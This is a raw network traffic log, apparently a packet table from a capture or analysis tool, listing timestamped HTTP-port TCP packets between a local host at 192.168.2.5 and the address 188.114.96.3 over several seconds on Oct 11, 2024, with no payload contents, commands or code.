                                                                Oct 11, 2024 01:36:36.286524057 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.287467003 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.292150021 CEST8049811188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.292213917 CEST4981180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.292382956 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.292463064 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.292578936 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.297463894 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.316111088 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.363478899 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.426717997 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.431530952 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.526575089 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.526843071 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.531687975 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.531833887 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.644917965 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.650048018 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.650063038 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.650074005 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.747127056 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.801094055 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.820775032 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.863470078 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.926450968 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:36.931488991 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:36.985327005 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.025099039 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.025274992 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.030226946 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.030313015 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.035372019 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.112658024 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.113517046 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.118278980 CEST8049818188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.118347883 CEST4981880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.118382931 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.118454933 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.118617058 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.123372078 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.320568085 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.363473892 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.427189112 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.432101011 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.473211050 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.478272915 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.478287935 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.478300095 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.525701046 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.525981903 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.530929089 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.531080961 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.581888914 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.629228115 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.833770990 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.837199926 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:37.879093885 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.879125118 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:37.969474077 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.014197111 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.014451981 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.019910097 CEST8049805188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.020095110 CEST4980580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.021085024 CEST8049825188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.021171093 CEST4982580192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.038400888 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.043356895 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.043443918 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.043611050 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.048388004 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.087732077 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.092787027 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.094238043 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.094677925 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.099536896 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.394784927 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.399847031 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.399863958 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.399876118 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.442022085 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.472830057 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.669958115 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.669985056 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.670630932 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.670864105 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.671009064 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.702796936 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.702860117 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.722826004 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.738609076 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.785325050 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.892467976 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.893070936 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.897800922 CEST8049831188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.897881985 CEST4983180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.898031950 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:38.898121119 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.898224115 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:38.903009892 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.033168077 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.082180977 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.145467043 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.150443077 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.239865065 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.240168095 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.245023012 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.245166063 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.254156113 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.259207010 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.259247065 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.259259939 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.340873003 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.394680977 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.540537119 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.582175016 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.590240002 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.644670963 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.645142078 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.649913073 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.703867912 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.704685926 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.709136963 CEST8049838188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.709199905 CEST4983880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.709551096 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.709649086 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.709759951 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.714498997 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.746145010 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.746279955 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:39.751204014 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:39.751257896 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.045020103 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.066659927 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.071939945 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.071952105 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.071959019 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.097786903 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.155514956 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.160705090 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.165647030 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.207310915 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.255075932 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.255245924 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.260195017 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.260452986 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.401849985 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.441555023 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.558254004 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.613406897 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.690958977 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.696120977 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.710994959 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.711673021 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.716248989 CEST8049844188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.716320038 CEST4984480192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.716650009 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.716711044 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.716912985 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.722067118 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.785904884 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.786123991 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:40.791219950 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:40.791486025 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.066626072 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.071911097 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.071949005 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.071978092 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.081494093 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.129029036 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.162638903 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.192003965 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.196913958 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.207142115 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.286644936 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.286803961 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.292335987 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.292367935 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.406508923 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.457153082 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.529798985 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.530473948 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.534970999 CEST8049850188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.535020113 CEST4985080192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.535300016 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.535370111 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.535464048 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.540283918 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.543111086 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.597877026 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.677723885 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.695489883 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.700928926 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.790795088 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.791059971 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.796417952 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.894838095 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:41.900377989 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.900418997 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.900449038 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:41.990338087 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.035274982 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.044852018 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.045912027 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.050755978 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.140520096 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.140722990 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.144664049 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.145699024 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.145775080 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.149517059 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.241554976 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.285263062 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.330290079 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.379069090 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.438457012 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.438755035 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.443598986 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.453274965 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.454119921 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.458439112 CEST8049861188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.458504915 CEST4986180192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.458966017 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.459225893 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.459227085 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.464174986 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.533309937 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.533535957 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.538589001 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.538619041 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.538646936 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.789637089 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.790411949 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.795264959 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.816699982 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.821773052 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.821803093 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.821830988 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.884583950 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.884783030 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:42.889902115 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.889930964 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.905380011 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:42.957199097 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.144416094 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.167165041 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.191520929 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.222837925 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.261251926 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.266179085 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.355474949 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.355649948 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.360476971 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.360692024 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.488559008 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.489181042 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.493932962 CEST8049867188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.493997097 CEST4986780192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.494051933 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.494136095 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.494260073 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.499044895 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.659668922 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.707118988 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.770101070 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.774995089 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.847786903 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.852705956 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.852765083 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.852792978 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.864298105 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.864430904 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:43.869276047 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.869803905 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.943479061 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:43.988343954 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.167305946 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.194454908 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.222737074 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.238353014 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.270144939 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.275074005 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.312947035 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.313676119 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.318665028 CEST8049873188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.318707943 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.318731070 CEST4987380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.318774939 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.318892956 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.323736906 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.364566088 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.364727020 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.369785070 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.369898081 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.663569927 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.676076889 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.681170940 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.681202888 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.681231022 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.707164049 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.770215034 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.775136948 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.784035921 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.832092047 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.864643097 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.865209103 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:44.870062113 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:44.870275021 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.043194056 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.097774029 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.159729004 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.161530018 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.165210009 CEST8049878188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.165466070 CEST4987880192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.166471958 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.166939020 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.167375088 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.172295094 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.179203987 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.223278999 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.288573027 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.293720961 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.384085894 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.384269953 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.389520884 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.389561892 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.519884109 CEST4988380192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.525115967 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.525151968 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.525180101 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.660372019 CEST8049832188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.660772085 CEST8049883188.114.96.3192.168.2.5
                                                                Oct 11, 2024 01:36:45.707113028 CEST4983280192.168.2.5188.114.96.3
                                                                Oct 11, 2024 01:36:45.707370996 CEST4988380192.168.2.5188.114.96.3
